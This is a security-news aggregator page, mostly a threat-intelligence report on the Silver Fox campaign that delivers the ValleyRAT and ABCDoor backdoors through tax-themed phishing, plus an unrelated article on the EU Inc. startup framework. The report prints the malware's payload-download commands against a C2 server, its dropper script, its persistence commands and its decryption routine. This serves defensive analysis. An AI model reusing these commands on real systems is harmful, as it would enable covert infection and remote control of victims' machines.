Security-Portal.cz je internetový portál zaměřený na počítačovou bezpečnost, hacking, anonymitu, počítačové sítě, programování, šifrování, exploity, Linux a BSD systémy. Provozuje spoustu zajímavých služeb a podporuje příznivce v zajímavých projektech.

Kategorie

New Linux 'Copy Fail' Vulnerability Enables Root Access on Major Distributions

The Hacker News - 1 hodina 42 min zpět
Cybersecurity researchers have disclosed details of a Linux local privilege escalation (LPE) flaw that could allow an unprivileged local user to obtain root. The high-severity vulnerability tracked as CVE-2026-31431 (CVSS score: 7.8) has been codenamed Copy Fail by Xint.io and Theori. "An unprivileged local user can write four controlled bytes into the page cache of any readable file on a Linux Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]
Kategorie: Hacking & Security

Google Fixes CVSS 10 Gemini CLI CI RCE and Cursor Flaws Enable Code Execution

The Hacker News - 3 hodiny 59 min zpět
Google has addressed a maximum severity security flaw in Gemini CLI -- the "@google/gemini-cli" npm package and the "google-github-actions/run-gemini-cli" GitHub Actions workflow -- that could have allowed attackers to execute arbitrary commands on host systems. "The vulnerability allowed an unprivileged external attacker to force their own malicious content to load as Gemini configuration," Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]
Kategorie: Hacking & Security

Silver Fox uses the new ABCDoor backdoor to target organizations in Russia and India

Kaspersky Securelist - 4 hodiny 6 min zpět

In December 2025, we detected a wave of malicious emails designed to look like official correspondence from the Indian tax service. A few weeks later, in January 2026, a similar campaign began targeting Russian organizations. We have attributed this activity to the Silver Fox threat group.

Both waves followed a nearly identical structure: phishing emails were styled as official notices regarding tax audits or prompted users to download an archive containing a “list of tax violations”. Inside the archive was a modified Rust-based loader pulled from a public repository. This loader would download and execute the well-known ValleyRAT backdoor. The campaign impacted organizations across the industrial, consulting, retail, and transportation sectors, with over 1600 malicious emails recorded between early January and early February.

During our investigation, we also discovered that the attackers were delivering a new ValleyRAT plugin to victim devices, which functioned as a loader for a previously undocumented Python-based backdoor. We have named this backdoor ABCDoor. Retrospective analysis reveals that ABCDoor has been part of the Silver Fox arsenal since at least late 2024 and has been utilized in real-world attacks from the first quarter of 2025 to the present day.

Email campaign

In the January campaign, victims received an email purportedly from the tax service with an attached PDF file.

Phishing email sent to victims in Russia

The PDF contained two clickable links to download an archive, both leading to a malicious website: abc.haijing88[.]com/uploads/фнс/фнс.zip.

Contents of the PDF file from the January phishing wave

Contents of the фнс.zip archive

In the December campaign, the malicious code was embedded directly within the files attached to the email.

Phishing email sent to victims in India

The email shown in the screenshot above was sent via the SendGrid cloud platform and contained an archive named ITD.-.rar. Inside was a single executable file, Click File.exe, with an Adobe PDF icon (the RustSL loader).

Contents of ITD.-.rar

Additionally, in late December, emails were distributed with an attachment titled GST.pdf containing two links leading to hxxps://abc.haijing88[.]com/uploads/印度邮箱/CBDT.rar. (印度邮箱 translates from Chinese as “Indian mailbox”).

PDF file from the phishing email

Both versions of the campaign attempt to exploit the perceived importance of tax authority correspondence to convince the victim to download the document and initiate the attack chain. The method of using download links within a PDF is specifically designed to bypass email security gateways; since the attached document only contains a link that requires further analysis, it has a higher probability of reaching the recipient compared to an attachment containing malicious code.

RustSL loader

The attackers utilized a modified version of a Rust-based loader called RustSL, whose source code is publicly available on GitHub with a description in Chinese:

Screenshot of the description from the RustSL loader GitHub project

The description also refers to RustSL as an antivirus bypass framework, as it features a builder with extensive customization options:

  • Eight payload encryption methods
  • Thirteen memory allocation methods
  • Twelve sandbox and virtual machine detection techniques
  • Thirteen payload execution methods
  • Five payload encoding methods

Furthermore, the original version of RustSL encrypts all strings by default and inserts junk instructions to complicate analysis.

The Silver Fox APT group first began using a modified version of RustSL in late December 2025.

Silver Fox RustSL

This section examines the key changes the Silver Fox group introduced to RustSL. We will refer to this customized version as Silver Fox RustSL to distinguish it from the original.

The steganography.rs module

The attackers added a module named steganography.rs to RustSL. Despite the name, it has little to do with actual steganography; instead, it implements the unpacking logic for the malicious payload.

The usage of the new module within the Silver Fox RustSL code

The threat actors also modified the RustSL builder to support the new format and payload packing.

The attackers employed several methods to deliver the encrypted malicious payload. In December, we observed files being downloaded from remote hosts followed by delivery within the loader itself. Later, the attackers shifted almost entirely to placing the malicious payload inside the same archive as the loader, disguised as a standalone file with extensions like PNG, HTM, MD, LOG, XLSX, ICO, CFG, MAP, XML, or OLD.

Encrypted malicious payload format

The encrypted payload file delivered by the Silver Fox RustSL loader followed this structure:

<RSL_START>rsl_encrypted_payload<RSL_END>

If additional payload encoding was selected in the builder, the loader would decode the data before proceeding with decryption.

The rsl_encrypted_payload followed this specific format:

char sha256_hash[32]; // decrypted payload hash DWORD enc_payload_len; WORD sgn_decoder_size; char sgn_iterations; char sgn_key; char decoder[sgn_decoder_size]; char enc_payload[enc_payload_len];

Below is a description of the data blocks contained within it:

  • sha256_hash: the hash of the decrypted payload. After decryption, the loader calculates the SHA256 hash and compares it against this value; if they do not match, the process terminates.
  • enc_payload_len: the size of the encrypted payload
  • sgn_iterations and sgn_key: parameters used for decryption
  • sgn_decoder_size and decoder: unused fields
  • enc_payload: the primary payload

Notably, the new proprietary steganography.rs module was implemented using the same logic as the public RustSL modules (such as ipv4.rs, ipv6.rs, mac.rs, rc4.rs, and uuid.rs in the decrypt directory). It utilized a similar payload structure where the first 32 bytes consist of a SHA-256 hash and the payload size.

To decrypt the malicious payload, steganography.rs employed a custom XOR-based algorithm. Below is an equivalent implementation in Python:

def decrypt(data: bytes, sgn_key: int, sgn_iterations: int) -> bytes: buf = bytearray(data) xor_key = sgn_key & 0xFF for _ in range(sgn_iterations): k = xor_key for i in range(len(buf)): dec = buf[i] ^ k if k & 1: k = (dec ^ ((k >> 1) ^ 0xB8)) & 0xFF else: k = (dec ^ (k >> 1)) & 0xFF buf[i] = dec return bytes(buf)

The unpacking process consists of the following stages:

  1. Extraction of rsl_encrypted_payload.The loader extracts the encrypted payload body located between the <RSL_START> and <RSL_END> markers.

    Original file containing the encrypted malicious payload

  2. XOR decryption with a hardcoded key.Most loaders used the hardcoded key RSL_STEG_2025_KEY.
  3. Payload decoding occurs if the corresponding setting was enabled in the builder.The GitHub version of the builder offers several encoding options: Base64, Base32, Hex, and urlsafe_base64. Silver Fox utilized each option at least once. Base64 was the most frequent choice, followed by Hex and Base32, with urlsafe_base64 appearing in a few samples.

    Encrypted malicious payload prior to the final decryption stage

  4. Decryption of the final payload using a multi-pass XOR algorithm that modifies the key after each iteration (as demonstrated in the Python algorithm provided above).
The guard.rs module

Another module added to Silver Fox RustSL is guard.rs. It implements various environment checks and country-based geofencing.

In the earliest loader samples from late December 2025, the Silver Fox group utilized every available method for detecting virtual machines and sandboxes, while also verifying if the device was located in a target country. In later versions, the group retained only the geolocation check; however, they expanded both the list of countries allowed for execution and the services used for verification.

The GitHub version of the loader only includes China in its country list. In customized Silver Fox loaders built prior to January 19, 2026, this list included India, Indonesia, South Africa, Russia, and Cambodia. Starting with a sample dated January 19, 2026 (MD5: e6362a81991323e198a463a8ce255533), Japan was added to the list.

To determine the host country, Silver Fox RustSL sends requests to five public services:

  • ip-api.com (the GitHub version relies solely on this service)
  • ipwho.is
  • ipinfo.io
  • ipapi.co
  • www.geoplugin.net
Phantom Persistence

We discovered that a loader compiled on January 7, 2026 (MD5: 2c5a1dd4cb53287fe0ed14e0b7b7b1b7), began to use the recently documented Phantom Persistence technique to establish persistence. This method abuses functionality designed to allow applications requiring a reboot for updates to complete the installation process properly. The attackers intercept the system shutdown signal, halt the normal shutdown sequence, and trigger a reboot under the guise of an update for the malware. Consequently, the loader forces the system to execute it upon OS startup. This specific sample was compiled in debug mode and logged its activity to rsl_debug.log, where we identified strings corresponding to the implementation of the Phantom Persistence technique:

[unix_timestamp] God-Tier Telemetry Blinding: Deployed via HalosGate Indirect Syscalls. [unix_timestamp] RSL started in debug mode. [unix_timestamp] ========================================== [unix_timestamp] Phantom Persistence Module (Hijack Mode) [unix_timestamp] ========================================== [unix_timestamp] [*] Calling RegisterApplicationRestart... [unix_timestamp] [+] RegisterApplicationRestart succeeded. [unix_timestamp] [*] Note: This API mainly works for application crashes, not for user-initiated shutdowns. [unix_timestamp] [*] For full persistence, you need to trigger the shutdown hijack logic. [unix_timestamp] [*] Starting message thread to monitor shutdown events... [unix_timestamp] [+] SetProcessShutdownParameters (0x4FF) succeeded. [unix_timestamp] [+] Window created successfully, message loop started. [unix_timestamp] [+] Phantom persistence enabled successfully. [unix_timestamp] [*] Hijack logic: Shutdown signal -> Abort shutdown -> Restart with EWX_RESTARTAPPS. [unix_timestamp] Phantom persistence enabled. [unix_timestamp] Mouse movement check passed. [unix_timestamp] IP address check passed. [unix_timestamp] Pass Sandbox/VM detection.

Attack chain and payloads

During this phishing campaign, Silver Fox utilized two primary methods for delivering malicious archives:

  • As an email attachment
  • Via a link to an external attacker-controlled website contained within a PDF attachment

We also observed three different ways the payload was positioned relative to the loader:

  • Embedded within the loader body
  • Hosted on an external website as a PNG image
  • Placed within the same archive as the loader

The diagram below illustrates the attack chain using the example of an email containing a PDF file and the subsequent delivery of a malicious payload from an external attacker-controlled website.

Attack chain of the campaign utilizing the RustSL loader

The infection chain begins when the user runs an executable file (the Silver Fox modification of the RustSL loader) disguised with a PDF or Excel icon. RustSL then loads an encrypted payload, which functions as shellcode. This shellcode then downloads an encrypted ValleyRAT (also known as Winos 4.0) backdoor module named 上线模块.dll from the attackers’ server. The filename translates from Chinese as “online-module.dll”, so for the sake of clarity, we’ll refer to it as the Online module.

Beginning of the decrypted payload: shellcode for loading the ValleyRAT (Winos 4.0) Online module

The Online module proceeds to load the core component of ValleyRAT: the Login module (the original filename 登录模块.dll_bin translates from Chinese as “login-module.dll_bin”). This module manages C2 server communication, command execution, and the downloading and launching of additional modules.

The initial shellcode, as well as the Online and Login modules, utilize a configuration located at the end of the shellcode:

End of the decrypted payload: ValleyRAT (Winos 4.0) configuration

The values between the “|” delimiters are written in reverse order. By restoring the correct character sequence, we obtain the following string:

|p1:207.56.138[.]28|o1:6666|t1:1|p2:127.0.0.1|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:飘诈|bb:1.0|bz:2025.11.16|jp:0|bh:0|ll:0|dl:0|sh:0|kl:0|bd:0|

The key configuration parameters in this string are:

  • p#, o#: IP addresses and ports of the ValleyRAT C2 servers in descending order of priority
  • bz: the creation date of the configuration

The Silver Fox group has long employed the infection chain described above – from the encrypted shellcode through the loading of the Login module – to deploy ValleyRAT. This procedure and its configuration parameters are documented in detail in industry reports: (1, 2, and 3).

Once the Login module is running, ValleyRAT enters command-processing mode, awaiting instructions from the C2. These commands include the retrieval and execution of various additional modules.

ValleyRAT utilizes the registry to store its configurations and modules:

Registry key Description HKCU:\Console\0 For x86-based modules HKCU:\Console\1 For x64-based modules HKCU:\Console\IpDate Hardcoded registry location checked upon Login module startup HKCU:\Software\IpDates_info Final configuration

The ValleyRAT builder leaked in March 2025 contained 20 primary and over 20 auxiliary modules. During this specific phishing campaign, we discovered that after the main module executed, it loaded two previously unseen modules with similar functionality. These modules were responsible for downloading and launching a previously undocumented Python-based backdoor we have dubbed ABCDoor.

Custom ValleyRAT modules

The discovered modules are named 保86.dll and 保86.dll_bin. Their parameters are detailed in the table below.

HKCU:\Console\0 registry key value Module name Library MD5 hash Compiled date and time (UTC) fc546acf1735127db05fb5bc354093e0 保86.dll 4a5195a38a458cdd2c1b5ab13af3b393 2025-12-04 04:34:31 fc546acf1735127db05fb5bc354093e0 保86.dll e66bae6e8621db2a835fa6721c3e5bbe 2025-12-04 04:39:32 2375193669e243e830ef5794226352e7 保86.dll_bin e66bae6e8621db2a835fa6721c3e5bbe 2025-12-04 04:39:32

Of particular note is the PDB path found in all identified modules: C:\Users\Administrator\Desktop\bat\Release\winos4.0测试插件.pdb. In Chinese, 测试插件 translates to “test plugin”, which may suggest that these modules are still in development.

Upon execution, the 保86.dll module determines the host country by querying the same five services used by the guard.rs module in Silver Fox RustSL: ipinfo.io, ip-api.com, ipapi.co, ipwho.is, and geoplugin.net. For the module to continue running, the infected device must be located in one of the following countries:

Countries where the 保86.dll module functions

If the geolocation check passes, the module attempts to download a 52.5 MB archive from a hardcoded address using several methods. The sample with MD5 4a5195a38a458cdd2c1b5ab13af3b393 queried hxxp://154.82.81[.]205/YD20251001143052.zip, while the sample with MD5 e66bae6e8621db2a835fa6721c3e5bbe queried
hxxp://154.82.81[.]205/YN20250923193706.zip.

Interestingly, Silver Fox updated the YD20251001143052.zip archive multiple times but continued to host it on the same C2 (154.82.81[.]205) without changing the filename.

The module implements the following download methods:

  1. Using the InternetReadFile function with the User-Agent PythonDownloader
  2. Using the URLDownloadToFile function
  3. Using PowerShell:
    powershell.exe -Command "& {[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12; [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $ProgressPreference = 'SilentlyContinue'; try { Invoke-WebRequest -Uri 'hxxp://154.82.81[.]205/YD20251001143052.zip' -OutFile '$appdata\appclient\111.zip' -UseBasicParsing -TimeoutSec 600 } catch { exit 1 } }"
  4. Using curl:
    curl.exe -L -o "%LOCALAPPDATA%\appclient\111.zip" "hxxp://154.82.81[.]205/YD20251001143052.zip" --silent --show-error --insecure --max-time 600

The archive was saved to the path %LOCALAPPDATA%\appclient\111.zip.

Contents of the 111.zip archive

The archive is quite large because the python directory contains a Python environment with the packages required to run the previously unknown ABCDoor backdoor (which we will describe in the next section), while the ffmpeg directory includes ffmpeg.exe, a statically linked, legitimate audio/video tool that the backdoor uses for screen capturing.

Once downloaded, the DLL module extracts the archive using COM methods and runs the following command to execute update.bat:

cmd.exe /c "C:\Users\<user>\AppData\Local\appclient\update.bat"

The update.bat script copies the extracted files to C:\ProgramData\Tailscale. This path was chosen intentionally: it corresponds to the legitimate utility Tailscale (a mesh VPN service based on the WireGuard protocol that connects devices into a single private network). By mimicking a VPN service, the attackers likely aim to mask their presence and complicate the analysis of the compromised system.

@echo off set "script_dir=%~dp0" set SRC_DIR=%script_dir% set DES_DIR=C:\ProgramData\Tailscale rmdir /s /q "%DES_DIR%" mkdir "%DES_DIR%" call :recursiveCopy "%SRC_DIR%" "%DES_DIR%" start "" /B "%DES_DIR%\python\pythonw.exe" -m appclient exit /b :recursiveCopy set "src=%~1" set "dest=%~2" if not exist "%dest%" mkdir "%dest%" for %%F in ("%src%\*") do ( copy "%%F" "%dest%" >nul ) for /d %%D in ("%src%\*") do ( call :recursiveCopy "%%D" "%dest%\%%~nxD" ) exit /b

Contents of update.bat

After copying the files, the script launches the appclient Python module using the legitimate pythonw tool:

start "" /B "%DES_DIR%\python\pythonw.exe" -m appclient

ABCDoor Python backdoor

The primary entry point for the appclient module, the __main__.py file, contains only a few lines of code. These lines are responsible for utilizing the setproctitle library and executing the run function, to which the C2 address is passed as a parameter.

Code for main.py: the module entry point

The setproctitle library is primarily used on Linux or macOS systems to change a displayed process name. However, its functionality is significantly limited on Windows; rather than changing the process name itself, it creates a named object in the format python(<pid>): <proctitle>. For example, for the appclient module, this object would appear as follows:

\Sessions\1\BaseNamedObjects\python(8544): AppClientABC

We believe the use of setproctitle may indicate the existence of backdoor versions for non-Windows systems, or at least plans to deploy it in such environments.

The appclient.core module has a PYD extension and is a DLL file compiled with Cython 3.0.7. This is the core module of the backdoor, which we have named ABCDoor because nearly all identified C2 addresses featured the third-level domain abc.

Upon execution, the backdoor establishes persistence in the following locations:

  1. Windows registry: It adds "<path_to_pythonw.exe>" -m appclient to the value HKCU:\Software\Microsoft\Windows\CurrentVersion\Run:AppClient, e.g:
    "C:\Users\&lt;username&gt;\AppData\Local\appclient\python\pythonw.exe" -m appclient
    Persistence is established by executing the following command:
    cmd.exe /c "reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "AppClient" /t REG_SZ /d "\"<path_to_pythonw.exe>\" -m appclient" /f"
  2. Task scheduler: The malware executes
    cmd.exe /c "schtasks /create /sc minute /mo 1 /tn "AppClient" /tr "<path_to_pythonw.exe> -m appclient" /f"

The command creates a task named “AppClient” that runs every minute.

The backdoor is built on the asyncio and Socket.IO Python libraries. It communicates with its C2 via HTTPS and uses event handlers to processes messages asynchronously. The backdoor follows object-oriented programming principles and includes several distinct classes:

  • MainManager: handles C2 connection and authorization (sending system metadata)
  • MessageManager: registers and executes message handlers
  • AutoStartManager: manages backdoor persistence
  • ClientManager: handles backdoor updates and removal
  • SystemInfoManager: collects data from the victim’s system, including screenshots
  • RemoteControlManager: enables remote mouse and keyboard control via the pynput library and manages screen recording (using the ScreenRecorder child class)
  • FileManager: performs file system operations
  • KeyboardManager: emulates keyboard input
  • ProcessManager: manages system processes
  • ClipboardManager: exfiltrates clipboard contents to the C2
  • CryptoManager: provides functions for encrypting and decrypting files and directories (currently limited to DPAPI; asymmetric encryption functions lack implementation)
  • Utils: auxiliary functions (file upload/download, archive management, error log uploading, etc.)

Backdoor strings with characteristic names

Upon connecting, ABCDoor sends an auth message to the C2 with the following information in JSON format:

"role": "client", "device_info": { "device_name": device_name, "os_name": os_name, "os_version": os_version, "os_release": os_release, "device_id": device_id, "install_channel": "<channel_name_from_registry>", # optional field "first_install_time": "<install_time_from_registry>", # optional field }, "version": 157 # hard-coded ABCDoor version

The code for retrieving the device identifier (device_id) in the backdoor is somewhat peculiar:

device_id = Utility.get_machine_guid_via_file_func() device_id = Utility.get_machine_guid_via_reg()

First, the get_machine_guid_via_file_func function attempts to read an identifier from the file %LOCALAPPDATA%\applogs\device.log. If the file does not exist, it is created and initialized with a random UUID4 value. However, immediately after this, the get_machine_guid_via_reg function overwrites the identifier obtained by the first function with the value from HKLM:\SOFTWARE\Microsoft\Cryptography:MachineGuid. This likely indicates a bug in the code.

The primary characteristic of this backdoor is the absence of typical remote control features, such as creating a remote shell or executing arbitrary commands. Instead, it implements two alternative methods for manipulating the infected device:

  • Emulating a double click while broadcasting the victim’s screen
  • A "file_open" message within the FileManager class, which calls the os.startfile function. This executes a specified file using the ShellExecute function and the default handler for that file extension

For screen broadcasting, the backdoor utilizes a standalone ffmpeg.exe file included in the ABCDoor archive. While early versions could only stream from a single monitor, recent iterations have introduced support for streaming up to four monitors simultaneously using the Desktop Duplication API (DDA). The broadcasting process relies on the screen capture functions RemoteControl::ScreenRecorder::start_single_monitor_ddagrab, RemoteControl::ScreenRecorder::start_multi_monitor_ddagrab, and RemoteControl::ScreenRecorder::test_ddagrab_support. These functions generate a lengthy string of launch arguments for ffmpeg; these arguments account for monitor orientation (vertical or horizontal) and quantity, stitching the data into a single, cohesive stream.

Because ABCDoor runs within a legitimate pythonw.exe process, it can remain hidden on a victim’s system for extended periods. However, its operation involves various interactions with the registry and file system that can be used for detection. Specifically, ABCDoor:

  • Writes its initial installation timestamp to the registry value HKCU:\Software\CarEmu:FirstInstallTime
  • Creates the directory and file %LOCALAPPDATA%\applogs\device.log to store the victim’s ID
  • Logs any exceptions to %LOCALAPPDATA%\applogs\exception_logs.zip. Interestingly, Silver Fox even implemented a Utility::upload_exception_logs function to send this archive to a specified URI, likely to help debug and refine the malware’s performance

Additionally, ABCDoor features self-update and self-deletion capabilities that generate detectable artifacts. Updates are downloaded from a specific URI to %TEMP%\tmpXXXXXXXX\update.zip (where XXXXXXXX represents random alphanumeric characters), extracted to %TEMP%\tmpXXXXXXXX\update, and executed via a PowerShell command:

powershell -Command "Start-Sleep -Seconds 5; Start-Process -FilePath \"%TEMP%\tmpXXXXXXXX\update\update.ps1\" -ArgumentList \"%LOCALAPPDATA%\appclient\" -WindowStyle Hidden"

The existing ABCDoor process is then forcibly terminated.

ABCDoor versions

Through retrospective analysis, we discovered that the earliest version of ABCDoor (MD5: 5b998a5bc5ad1c550564294034d4a62c) surfaced in late 2024. The backdoor evolved rapidly throughout 2025. The table below outlines the primary stages of its evolution:

Version Compiled date (UTC) Key updates ABCDoor .pyd MD5 hash 121 2024.12.19 18:27:11 –  Minimal functionality (file downloads, remote control using the Graphics Device Interface (GDI) in ffmpeg)
–  No OOP used
–  Registry persistence 5b998a5bc5ad1c550564294034d4a62c 143 2025.02.04 01:15:00 Client updates
–  Task scheduler persistence
–  OOP implementation (classes)
–  Clipboard management
–  Process management
–  Asymmetric file and directory encryption c50c980d3f4b7ed970f083b0d37a6a6a 152 2025.04.01 15:39:36 –  DPAPI encryption functions
–  Chunked file uploading to C2 de8f0008b15f2404f721f76fac34456a 154 2025.05.09 13:36:24 –  Implementation of installation channels
–  Key combination emulation 9bf9f635019494c4b70fb0a7c0fb53e4 156 2025.08.11 13:36:10 –  Retrieval and logging of initial installation time to the registry a543b96b0938de798dd4f683dd92a94a 157 2025.08.28 14:23:57 –  Use of DDA source in ffmpeg for monitor screen broadcasting fa08b243f12e31940b8b4b82d3498804 157 2025.09.23 11:38:17 –  Compiled with Cython 3.0.7 (previous version used Cython 3.0.12) 13669b8f2bd0af53a3fe9ac0490499e5 Evolution of ABCDoor distribution methods

Although the first version of the backdoor appeared in late 2024, the threat actor likely began using it in attacks around February or March 2025. At that time, the backdoor was distributed using stagers written in C++ and Go:

Scaling up a tech startup in Europe is hard — ‘EU Inc.’ aims to help

Computerworld.com [Hacking News] - 4 hodiny 6 min zpět

Europe produces a large number of new tech startups each year – 28 crossed the $1 billion valuation mark in 2025 alone – yet few become global technology leaders. Many that do succeed look elsewhere to scale, particularly in the US.

Founders point to multiple barriers to growing their business in the European Union (EU), including the complexity of navigating 27 different national legal systems. Despite access to the EU’s single market — home to 450 million consumers and 23 million companies — expanding across borders still brings significant legal, financial and operational complexity.

These are among the challenges the European Commission’s proposed “EU Inc.” framework, unveiled last month, aims to tackle, with plans for a standardized, pan-EU company structure or “28th Regime.” Rather than navigating distinct national systems, companies that opt in to EU Inc. can incorporate once and operate under a single set of rules. Measures include digital incorporation within 48 hours, simplified cross-border registration, and more consistent treatment of employee stock options.

The move comes as a number of European nations are at least considering cutting ties with US tech firms amid ongoing geopolitical uncertainty — part of a digital sovereignty movement that has gained ground in recent months.

While the EU has attempted to create pan-European corporate structures before, including the Societas Europaea, uptake has been limited. But the initial reactions to EU Inc. have been upbeat, with startup founders and legal experts seeing it as a step toward easing some of the friction involved in building across borders, alongside broader reforms.

Gerardo Gagliardo, co-founder and chief financial officer at Exein, an Italian embedded security vendor, has spent seven years navigating the legal and financial challenges of scaling a European “deep tech” company across borders. “The technology is borderless for us, but the commercial legal layer is not,” he said. “That’s the main challenge for us, and I think the EU Inc. framework could help here.” 

“One of the biggest challenges for European startups today is fragmentation,” said Sebastien Marchon, CEO and founder of Belgian expense management software firm Rydoo. “Building a company across Europe still means navigating multiple legal systems, regulatory frameworks and administrative processes. Anything that reduces this friction and helps entrepreneurs scale faster across the continent is a step in the right direction.”

Jeroen Ten Broecke, an associate lawyer at Belgian firm Philippe & Partners, said the EU Inc. proposals could “significantly reduce fragmentation” in corporate law, lowering administrative costs and friction for cross-border activity, particularly for early-stage startups. The standardized, digital-by-default approach should also “make it easier to incorporate and operate across member states,” he said.

Complexity begins at incorporation

For startups just getting going, the administrative burden begins when setting up their company. For Exein, founded in Italy, the incorporation process required a notary and lawyers, creating additional costs and bureaucracy in its early days. “At the beginning, when you are a young startup, this overcomplicates things because you don’t have money,” said Gagliardo. “You have a lot of costs and it’s really time consuming.”  

Augustin Prot, co-founder of French SaaS translation platform Weglot, took a different approach. When the company launched in 2015, it initially operated without a formal legal structure to “avoid unnecessary admin costs,” he said. Weglot continued that way for six months before the founders felt they could justify investing in the administrative setup process required to create a legal entity in France. 

The proposed EU Inc. framework could have simplified those early decisions, said Prot. “Having a single, harmonized option, such as being registerable in 48 hours for under €100, would have meaningfully simplified our early days,” he said. It would also have reduced the difficulty of choosing a legal structure. In France, startups can choose between several incorporation types, including SAS, SARL and SA. “Choosing the wrong one can cost you time and energy to fix afterwards,” he said.

As companies grow, the number of administrative challenges can multiply.

Since launching in 2018, Exein has expanded to offices in Germany, the US, and Taiwan, and there are plans to open a legal entity in Japan.Each EU member state effectively requires a new legal setup, said Gagliardo, creating an added burden.  

“Every new market treats us as a new company,” he said. “If you sell in France or Germany, for example, it’s different from Italy.”

That fragmentation can slow routine business operations. For example, a recent revolving credit facility with JP Morgan involved hiring lawyers in Germany, UK and Italy, with three separate governance and authorization processes. The process took three months of work, said Gagliardo, something that could have been done in hours if laws had been harmonized. Despite these challenges, the company remains committed to building in Europe.

Another challenge for companies across Europe involves employee stock options. Tax treatment and grant rules vary significantly across member states, making it difficult to offer equity to employees. 

“The problem of complexity around the stock option plans…, it’s really a mess right now,” said Gagliardo. EU Inc. proposals “will be a game changer for Europe” in this regard, he said, with uniform rules making it easier to attract and retain workers.

Prot agrees. Harmonized stock options are “a powerful tool for attracting and retaining talent in a growing startup,” he said, adding that differing rules across Europe create “an uneven playing field compared to the US, where the framework is far simpler and more attractive.” EU Inc. could include “a clear European standard on this point.”

These challenges can slow growth and force startups to look to other markets —  particularly the US. “Expanding across Europe quickly exposes the gap between the idea of a single market and the operational reality,” said Marchon.

“You essentially have to rebuild your compliance, tax, and labor structures every time you cross a border,” said Damir Špoljarič, CEO of Czech cloud infrastructure provider VSHosting and managing partner at investment firm Gi21 Capital. “This dynamic completely shapes a founder’s go-to-market strategy…. If I am going to spend six months and significant capital jumping through regulatory hoops just to reach 10 [million] or 20 million new customers in an adjacent EU country, I might as well spend that same effort entering the US to reach over 330 million.

“It’s the primary reason so many ambitious European founders are effectively forced to target the US for their primary growth phase,” Špoljarič said. “The return on operational effort is simply much higher.” 

Roughly 18% of European tech startups are headquartered outside Europe at seed stage, and by Series C funding that figure rises to around 30%, according to Atomico’s State of European Tech 2025 report.

“That’s typically where we lose them,” said Tord Topsholm, CEO at 0to9, a Stockholm-based fintech venture builder. “The US is a big single market; Europe is a lot of different countries, with different cultures, languages, and legislation. It’s messier to scale here.”

EU Inc. — a way to fix Europe’s scaling challenge?

The question now is whether the EU Inc. proposal — which the Commission aims to have [in place] by the end of 2026 – can help reduce the barriers to scaling across Europe. Simon Miller, co-founder and head of broker international at German fintech Scalable Capital, sees the effort as a promising first step.

“To try to do everything at once would be challenging, so to focus on the incorporation piece, I think, is the right direction,” he said. “Obviously, the execution and the adoption will determine how impactful it is, but any initiative that creates momentum towards alignment between the EU countries and reduces fragmentation sets a precedent. This will only be positive for businesses like ours looking to operate across all of Europe.”

Ten Broecke said he’s “cautiously enthusiastic,” noting that, if successful, the real impact will probably be over the long term and “defined by a gradual and collective mindset shift.” But to achieve its aims, EU Inc. will need to overcome political resistance from member states keen to preserve competitive advantages in areas such as tax regimes and labor standards.

He anticipates “lobbying pressure from various interest groups” including labor organizations, as well as uneven uptake of the EU Inc idea, depending on how attractive the option proves compared to existing national company laws.

Even if its early plans are successful, EU Inc. is not intended to resolve all the challenges facing startups and scale-ups in Europe. Founders point to broader structural issues, including fragmented tax and employment rules.

Gagliardo would like to see harmonized rules for startups, for example, so that engineers working for the same European company in different countries are treated comparably.  

Managing differing VAT rules across member states also creates extra work, said Prot. “Even with a finance background, this can give you headaches,” he said, noting that Weglot had to hire an external accountant and dedicate at least a full day every month to compliance — “a real and recurring operational cost.”  

“It’s a surprising amount of complexity for something that’s supposed to be a single market,” he said. 

Access to capital is another issue. The Commission is seeking to address this through other initiatives under its EU Startup and Scale-up Strategy, including the Scale-up Europe Fund; the latter aims to make €5 billion available for investment in high-growth companies. Separately, the Savings and Investments Union aims to unlock more of Europe’s household savings for investment, potentially increasing the capital available to startups and scale-ups across the region. 

“A unified legal framework only fixes the paperwork. If we want to stop European tech giants from offshoring, this legal reform must be paired with aggressive late-stage capital and localized infrastructure,” said Špoljarič. 

Public markets present a further obstacle. Gagliardo’s goal is to take Exein to an IPO, but without a European equivalent of the Nasdaq, that would likely happen in the US under current conditions. “We are still too far from a framework that will allow us to do an IPO in Europe,” he said.   

Even so, his commitment to building in Europe remains firm. “We want to grow and expand our revenue in Europe, and I hope that this regulation will help us in that,” he said. “We choose to build in Europe — and we would choose it again — but we have done this despite the system, not because of it.”

Kategorie: Hacking & Security

Official SAP npm packages compromised to steal credentials

Bleeping Computer - 12 hodin 22 min zpět
Multiple official SAP npm packages were compromised in what is believed to be a TeamPCP supply-chain attack to steal credentials and authentication tokens from developers' systems. [...]
Kategorie: Hacking & Security

Popular WordPress redirect plugin hid dormant backdoor for years

Bleeping Computer - 12 hodin 53 min zpět
The Quick Page/Post Redirect plugin, installed on more than 70,000 WordPress sites, had a backdoor added five years ago that allows injecting arbitrary code into users' sites. [...]
Kategorie: Hacking & Security

Hackers exploit RCE flaws in Qinglong task scheduler for cryptomining

Bleeping Computer - 29 Duben, 2026 - 22:50
Hackers are exploiting two authentication bypass vulnerabilities in the Qinglong open-source task scheduling tool to deploy cryptominers on developers' servers. [...]
Kategorie: Hacking & Security

Hackers arrested for hijacking and selling 610,000 Roblox accounts

Bleeping Computer - 29 Duben, 2026 - 20:32
The Ukrainian police have arrested three individuals who hacked more than 610,000 Roblox gaming accounts and sold them for a profit of $225,000. [...]
Kategorie: Hacking & Security

The End of Patch and Pray: How Rust Is Reshaping Memory Safety in Linux

LinuxSecurity.com - 29 Duben, 2026 - 20:10
Most information security best practices are built on a single, comfortable assumption: that if we find a bug, we can patch it, and once it's patched, the system is "safe" again.
Kategorie: Hacking & Security

SAP-Related npm Packages Compromised in Credential-Stealing Supply Chain Attack

The Hacker News - 29 Duben, 2026 - 18:26
Cybersecurity researchers are sounding the alarm about a new supply chain attack campaign targeting SAP-related npm Packages with credential-stealing malware. According to reports from Aikido Security, Onapsis, OX Security, SafeDep, Socket, StepSecurity, and Google-owned Wiz, the campaign – calling itself the mini Shai-Hulud – has affected the following packages associated with SAP's Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]
Kategorie: Hacking & Security

